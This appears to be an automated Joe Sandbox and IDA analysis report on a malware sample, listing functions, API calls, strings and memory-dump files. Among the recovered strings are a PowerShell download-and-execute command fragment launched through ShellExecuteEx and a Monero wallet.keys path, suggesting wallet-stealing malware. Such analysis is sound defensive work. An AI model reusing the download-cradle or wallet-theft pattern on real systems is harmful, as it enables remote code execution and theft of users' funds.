Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 1c17428b0adaeb90d42264e911f96047c1e21bbda28c9a279d3945e4c52a7a0a
Instruction ID: 731b35dbccb453b5d3484cbab14251f34d1f082a47b3c2fb121ddb7f1c10b5a7
Opcode Fuzzy Hash: 1c17428b0adaeb90d42264e911f96047c1e21bbda28c9a279d3945e4c52a7a0a
Instruction Fuzzy Hash: 6CF08231905209EFE344DFE0E90972C7B70FB15703F08029AF60AC6690EA704B52DF96

Function 008A2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

ShellExecuteEx.SHELL32(0000003C), ref: 008A2D85

Strings

<, xrefs: 008A2D39
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 008A2CC4
')", xrefs: 008A2CB3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 008A2D04

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: e48377f2e5644837623a393cf5b4dbea614bdef282e6b6276299e0064d7d7826
Instruction ID: 3ee8b9c1af15917f13475199909b3e8d84d516505126c99f791836505315c3c1
Opcode Fuzzy Hash: e48377f2e5644837623a393cf5b4dbea614bdef282e6b6276299e0064d7d7826
Instruction Fuzzy Hash: E641DF71D102089AEB58EFA4C891BEEBB74FF11300F404129F016E7991DF786A4ACF92

Function 00899E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00899F41

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Strings

v20, xrefs: 00899E21
@, xrefs: 00899EF1
v10, xrefs: 00899EA3
ERROR_RUN_EXTRACTOR, xrefs: 00899E67

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: 6905f98ecc65e9a52381955fecf36e3c8fd22b5f00bc857f76487b76a40938b2
Instruction ID: ca8d02d2bd5a0ebe053cbd876e68f2e9507b46bacb0a467ba7383604e893cb7f
Opcode Fuzzy Hash: 6905f98ecc65e9a52381955fecf36e3c8fd22b5f00bc857f76487b76a40938b2
Instruction Fuzzy Hash: E6610B70A10248DBDF18EFA8CC95BEE7775FF45304F048118E90ADB691EB746A05CB92

Function 008A6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 008A696C
sscanf.NTDLL ref: 008A6999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008A69B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008A69C0
ExitProcess.KERNEL32 ref: 008A69DA

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 3f4806590980dbf54ec9edd769fe109219a0a23573ed789f09f7e0fc487ae448
Instruction ID: 605c443f9daec423055942e3a01d4bd3acf505350f59057814f8c342dd293e5a
Opcode Fuzzy Hash: 3f4806590980dbf54ec9edd769fe109219a0a23573ed789f09f7e0fc487ae448
Instruction Fuzzy Hash: 3621FF75D00208ABDF04EFE4D945AEEB7B5FF58300F04452EE416E3250EB345615CB65

Function 008A9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0142E0B0,?,?,?,008A140C,?,0142E0B0,00000000), ref: 008A926C
lstrcpyn.KERNEL32(00ADAB88,0142E0B0,0142E0B0,?,008A140C,?,0142E0B0), ref: 008A9290
lstrlen.KERNEL32(?,?,008A140C,?,0142E0B0), ref: 008A92A7
wsprintfA.USER32 ref: 008A92C7

Strings

%s%s, xrefs: 008A92B5

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 5f61cc7f968093e021ea2673b34755536d28effc10fb1796135dac1efd75bda9
Instruction ID: 1e49b90e3c5a13c336ab7669be8696adcb2a216fb7e6d26105847559b3b4e773
Opcode Fuzzy Hash: 5f61cc7f968093e021ea2673b34755536d28effc10fb1796135dac1efd75bda9
Instruction Fuzzy Hash: AC019375601108FFDB04DFE8C988AEE7BB9EB58354F108549F90A9B344C671AA419B91

Function 008AC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 008AC8EC
___crtLCMapStringA.LIBCMT ref: 008AC90C
___crtLCMapStringA.LIBCMT ref: 008AC931

Strings

, xrefs: 008AC896

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 90aa5c9efe593a380a683767daeef6288b7c26dd3d0fbdf64e038a387dfa1c30
Instruction ID: e56e4ec92e135820e5210064eb1c03d82d7191784a61ae90dbc54a01dc496388
Opcode Fuzzy Hash: 90aa5c9efe593a380a683767daeef6288b7c26dd3d0fbdf64e038a387dfa1c30
Instruction Fuzzy Hash: 2941E87150479C9EEB258B248C84FFB7FE8FB46708F1844E8E98AC6582D2719A45CF61

Function 008A6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 008A6663

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

ShellExecuteEx.SHELL32(0000003C), ref: 008A6726
ExitProcess.KERNEL32 ref: 008A6755

Strings

<, xrefs: 008A66D9

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 2d3e8e598a16e8087fefdc22e5c075b67ff8fb7cab9646a05a46f5367106c86b
Instruction ID: 826382bf6358c6a054ae5874d34a860879fb05f72517569f9a6909b3ccda5448
Opcode Fuzzy Hash: 2d3e8e598a16e8087fefdc22e5c075b67ff8fb7cab9646a05a46f5367106c86b
Instruction Fuzzy Hash: 6B314DB1C01218ABEB58EB94DC81BDE7B78FF14300F404199F20AA6591DF746B49CF66

Function 008A87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008B0E28,00000000,?), ref: 008A882F
RtlAllocateHeap.NTDLL(00000000), ref: 008A8836
wsprintfA.USER32 ref: 008A8850

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Strings

%dx%d, xrefs: 008A8847

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: 6b4e3bd94ee5f477edb41fda674c191acbacd4f5cc01b9036a53fca52cc02156
Instruction ID: 19e6201027117bb4dc7278f025b4b2e8dfb59ca51cc79126fd11134d7aca922f
Opcode Fuzzy Hash: 6b4e3bd94ee5f477edb41fda674c191acbacd4f5cc01b9036a53fca52cc02156
Instruction Fuzzy Hash: 6B21FEB1A41208EFDB04DFD4DD45FAEBBB8FB49B11F104159FA06E7680C77999018BA1

Function 008A8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,008A951E,00000000), ref: 008A8D5B
RtlAllocateHeap.NTDLL(00000000), ref: 008A8D62
wsprintfW.USER32 ref: 008A8D78

Strings

%hs, xrefs: 008A8D6F

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
